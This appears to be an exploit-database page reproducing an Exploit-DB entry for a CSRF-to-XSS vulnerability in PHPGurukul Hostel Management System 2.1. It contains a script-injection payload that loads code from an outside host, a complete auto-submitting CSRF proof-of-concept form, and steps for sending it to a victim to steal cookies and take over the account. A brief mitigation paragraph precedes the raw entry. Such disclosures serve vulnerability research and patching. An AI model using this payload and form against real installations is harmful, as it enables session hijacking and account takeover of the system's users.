header-logo
Suggest Exploit
vendor:
Hostel Management System
by:
Anubhav Singh
8.8
CVSS
HIGH
Cross-site request forgery (CSRF) to Cross-site Scripting (XSS)
352
CWE
Product Name: Hostel Management System
Affected Version From: V 2.1
Affected Version To: V 2.1
Patch Exists: NO
Related CWE:
CPE: a:phpgurukul:hostel_management_system:2.1
Metasploit:
Other Scripts:
Platforms Tested: Windows 10, XAMPP
2021

PHPGurukul Hostel Management System 2.1 – Cross-site request forgery (CSRF) to Cross-site Scripting (XSS)

Navigate to http://localhost/hostel/hostel/my-profile.php and enter xss payload '><script src=https://anubhav1403.xss.ht></script> in name field. Click on Update Profile and intercept the request in Burpsuite. Generate a CSRF POC of Update Profile and send it to victim. When victim open the POC, his/her name will be updated to our XSS payload & payload will get fires. Attacker is able to steal Victim's cookies successfully!! Account takeover!!!

Mitigation:

Implement CSRF protection mechanisms such as tokens, origin checks, and referrer checks. Use a Content Security Policy (CSP) to prevent the execution of malicious scripts. Validate user input and encode output to prevent XSS attacks.
Source

Exploit-DB raw data:

# Exploit Title: PHPGurukul Hostel Management System 2.1 - Cross-site request forgery (CSRF) to Cross-site Scripting (XSS)
# Date: 2021-10-27
# Exploit Author: Anubhav Singh
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/hostel-management-system/
# Version: V 2.1
# Vulnerable endpoint: http://localhost/hostel/hostel/my-profile.php
# Tested on Windows 10, XAMPP

Steps to reproduce:

1) Navigate to http://localhost/hostel/hostel/my-profile.php 
2) Enter xss payload "><script src=https://anubhav1403.xss.ht></script> in name field
3) Click on Update Profile and intercept the request in Burpsuite
4) Generate a CSRF POC of Update Profile

```
<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost/hostel/hostel/my-profile.php" method="POST">
      <input type="hidden" name="regno" value="123456" />
      <input type="hidden" name="fname" value=""><script&#32;src&#61;https&#58;&#47;&#47;anubhav1403&#46;xss&#46;ht><&#47;script>" />
      <input type="hidden" name="mname" value="Hello" />
      <input type="hidden" name="lname" value="Singh" />
      <input type="hidden" name="gender" value="male" />
      <input type="hidden" name="contact" value="12345678995" />
      <input type="hidden" name="email" value="anubhav&#64;gmail&#46;com" />
      <input type="hidden" name="update" value="Update&#32;Profile" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>
```

5) Send this POC to victim
6) When victim open the POC, his/her name will be updated to our XSS payload & payload will get fires.
7) Now attacker get's the details of victim like ip address, cookies of Victim, etc
8) So attacker is able to steal Victim's cookies successfully!! Account takeover!!!

#POC

https://ibb.co/jVcZxnt
https://ibb.co/DwGh4x9

Navigation

Suggest Exploit

Services By CQR